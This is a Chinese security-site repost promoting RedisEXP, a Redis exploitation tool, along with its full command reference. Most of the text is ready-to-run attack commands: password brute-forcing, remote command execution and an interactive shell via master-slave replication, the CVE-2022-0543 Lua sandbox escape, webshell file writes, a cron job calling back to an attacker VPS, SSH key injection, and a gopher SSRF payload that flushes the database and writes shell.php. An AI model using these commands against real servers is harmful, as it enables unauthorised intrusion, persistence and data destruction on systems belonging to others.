一款用于Redis漏洞的利用工具

admin 2024年9月22日15:10:29评论15 views字数 2381阅读7分56秒阅读模式
工具介绍

@yuyan-sec使用golang写的一款Redis漏洞利用工具。注意:主从复制会清空数据,主从复制会清空数据,主从复制会清空数据,请注意使用!请注意使用!请注意使用!

一款用于Redis漏洞的利用工具
工具使用

██████╗ ███████╗██████╗ ██╗███████╗    ███████╗██╗  ██╗██████╗██╔══██╗██╔════╝██╔══██╗██║██╔════╝    ██╔════╝╚██╗██╔╝██╔══██╗██████╔╝█████╗  ██║  ██║██║███████╗    █████╗   ╚███╔╝ ██████╔╝██╔══██╗██╔══╝  ██║  ██║██║╚════██║    ██╔══╝   ██╔██╗ ██╔═══╝██║  ██║███████╗██████╔╝██║███████║    ███████╗██╔╝ ██╗██║╚═╝  ╚═╝╚══════╝╚═════╝ ╚═╝╚══════╝    ╚══════╝╚═╝  ╚═╝╚═╝基本连接: RedisExp.exe -r 192.168.19.1 -p 6379 -w 123456爆破 Redis 密码:RedisExp.exe brute -r 目标IP -p 目标端口 -f 字典文件RedisExp.exe brute -r 192.168.19.1 -f pass.txt主从复制执行命令 (默认是交互式 shell)(Redis版本 4.x - 5.x):RedisExp.exe -r 目标IP -p 目标端口 -w 密码 -L 本地IP -P 本地Port [-c whoami 单次执行]RedisExp.exe rce -r 192.168.19.1 -L 127.0.0.1 -c whoami (单次执行)RedisExp.exe rce -r 192.168.19.1 -L 127.0.0.1RedisExp.exe rce -r 192.168.19.1 -L 127.0.0.1 -f exp.so (Linux)主从复制文件上传 (windows 中文需要设置gbk)(Redis版本 4.x - 5.x):RedisExp.exe -r 目标IP -p 目标端口 -w 密码 -L 本地IP -P 本地Port -d 目标路径 -f 目标文件名 -F 本地文件RedisExp.exe upload -r 192.168.19.1 -L 127.0.0.1 -d c:\中文\ -f shell.php -F shell.txt -gRedisExp.exe upload -r 192.168.19.1 -L 127.0.0.1 -f shell.php -F shell.txt关闭主从复制RedisExp.exe close -r 192.168.19.1Lua沙盒绕过命令执行 CVE-2022-0543:RedisExp.exe lua -r 192.168.19.6 -c whoami备份写 Webshell: 1. Windows 中文路径要设置gbk, linux 中文路径不用设置。2. webshell的内容是base64,使用 -b 参数来解码。工具默认会关闭Redis压缩进行写入,写入后再恢复。RedisExp.exe shell -r 目标IP -p 目标端口 -w 密码 -d 目标路径 -f 目标文件名 -s Webshell内容RedisExp.exe shell -r 192.168.19.1 -d c:\中文\ -f shell.php -s "<?php phpinfo();?>" -gRedisExp.exe shell -r 192.168.19.1 -d c:\中文\ -f shell.php -s "PD9waHAgcGhwaW5mbygpOz8+" -g -bLinux 写计划任务:RedisExp.exe cron -r 目标IP -p 目标端口 -w 密码 -L VpsIP -P VpsPortRedisExp.exe cron -r 192.168.19.1 -L 127.0.0.1 -P 2222LinuxSSH 公钥:RedisExp.exe ssh -r 目标IP -p 目标端口 -w 密码 -n 用户名 -s 公钥RedisExp.exe ssh -r 192.168.19.1 -u root -s "ssh-rsa AAAAB"执行 Redis 命令:RedisExp.exe cli -r 192.168.19.1生成 gopher ssrf redis payload: RedisExp.exe gopher -f 1.txt
gopher 写webshell模板
flushallconfig set dir /tmpconfig set dbfilename shell.phpset 'webshell' '<?php phpinfo();?>'save
关闭Redis压缩(写入乱码的时候可以关闭压缩,工具在写入shell的时候默认添加了关闭压缩,写入后再恢复开启压缩)
config set rdbcompression no
  1. 具体命令使用-h来查看
  2. exp.dll和exp.so来自https://github.com/0671/RabR,已经把内容分别加载到dll.go 和so.go可以直接调用。
  3. Windows中文路径需要设置gbk,使用-g参数就可以了。
  4. 在写入webshell的时候因为有一些特殊字符,可以使用把webshell进行base64编码,然后使用-b参数来解码

报错

出现以下报错有可能是Redis版本太高,exp.so没有执行权限导致加载不了,具体需要查看服务端的报错。
工具报错:[ERR Error loading the extension. Please check the server logs.]        module load /tmp/exp.so服务端报错:Module /tmp/exp.so failed to load: It does not have execute permissions.

下载地址

https://github.com/yuyan-sec/RedisEXP

原文始发于微信公众号(Hack分享吧):一款用于Redis漏洞的利用工具

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月22日15:10:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一款用于Redis漏洞的利用工具http://cn-sec.com/archives/3134515.html

发表评论

匿名网友 填写信息